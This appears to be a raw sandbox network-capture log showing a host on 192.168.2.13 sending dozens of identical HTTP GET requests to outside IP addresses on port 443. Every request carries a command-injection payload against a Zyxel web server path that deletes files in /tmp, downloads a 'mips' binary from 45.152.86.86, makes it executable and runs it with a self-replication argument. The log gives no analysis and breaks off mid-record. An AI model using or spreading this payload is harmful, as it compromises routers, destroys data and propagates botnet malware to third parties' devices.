                              Mar 31, 2024 08:41:15.686074972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3102192.168.2.135432219.194.186.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686137915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3103192.168.2.1347888116.141.210.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686167955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3104192.168.2.133604493.27.240.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686201096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3105192.168.2.1350768223.83.244.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686225891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3106192.168.2.133784836.115.156.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686259985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3107192.168.2.133903292.15.16.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686320066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3108192.168.2.1353994137.135.67.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686357021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3109192.168.2.1355742126.255.39.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686384916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3110192.168.2.134711242.90.181.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686425924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3111192.168.2.1338702152.219.47.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686463118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3112192.168.2.1333054194.14.71.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686500072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3113192.168.2.1351192114.143.51.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686527014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3114192.168.2.134276023.175.241.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686563015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3115192.168.2.1353996145.25.166.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686615944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3116192.168.2.133315488.252.110.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686675072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3117192.168.2.13581041.157.93.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686743021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3118192.168.2.1357564216.38.189.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686762094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3119192.168.2.1343714153.103.119.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686790943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3120192.168.2.1344188139.229.124.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686860085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3121192.168.2.1338278124.24.77.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686908960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3122192.168.2.1356728161.23.150.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686945915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3123192.168.2.13380985.59.194.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.686979055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3124192.168.2.1351390189.210.158.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687060118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3125192.168.2.133574274.221.56.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687104940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3126192.168.2.1360114162.23.144.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687130928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3127192.168.2.134543690.240.9.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687179089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3128192.168.2.1347996179.199.153.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687220097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3129192.168.2.134736065.53.67.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687232971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3130192.168.2.135640672.97.213.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687279940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3131192.168.2.135884492.13.46.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687344074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3132192.168.2.1344988101.236.84.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687392950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3133192.168.2.134600651.177.197.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687433004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3134192.168.2.1358356186.174.48.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687478065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3135192.168.2.1336638198.78.201.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687516928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3136192.168.2.134795440.2.100.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687561989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3137192.168.2.133419482.97.224.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687592030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3138192.168.2.1345038193.46.45.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687640905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3139192.168.2.1360144143.195.108.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687696934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3140192.168.2.1335656223.125.239.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687724113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3141192.168.2.1356024168.246.71.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687758923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3142192.168.2.1359194193.120.97.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687782049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3143192.168.2.1360374186.220.178.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687849998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3144192.168.2.1357718211.152.144.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687896967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3145192.168.2.13465485.73.16.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687932014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3146192.168.2.1339002134.49.209.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.687968016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3147192.168.2.1356396203.178.23.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688008070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3148192.168.2.13357685.125.202.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688030005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3149192.168.2.134643097.120.61.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688085079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3150192.168.2.1356090189.7.102.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688133955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3151192.168.2.1349110220.15.97.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688177109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3152192.168.2.1338370125.116.192.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688199997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3153192.168.2.1352186109.8.144.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688236952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3154192.168.2.1339596120.174.69.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688291073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3155192.168.2.134281891.166.190.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688323975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3156192.168.2.134256461.151.41.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688358068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3157192.168.2.1336926148.211.179.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.688414097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3158192.168.2.134896663.189.137.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.691253901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3159192.168.2.1351522153.52.118.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.691879034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3160192.168.2.134875644.194.247.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.691915035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3161192.168.2.1350538177.26.86.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.691991091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3162192.168.2.134904459.126.135.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692018032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3163192.168.2.133902669.189.168.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692053080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3164192.168.2.1334512136.92.58.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692094088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3165192.168.2.134812460.248.215.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692162991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3166192.168.2.1357068164.22.47.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692184925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3167192.168.2.133575270.136.214.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692236900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3168192.168.2.13374261.185.9.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692295074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3169192.168.2.134682470.226.188.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:15.692329884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3170192.168.2.1353458116.223.20.33443
                              TimestampBytes transferredDirectionData
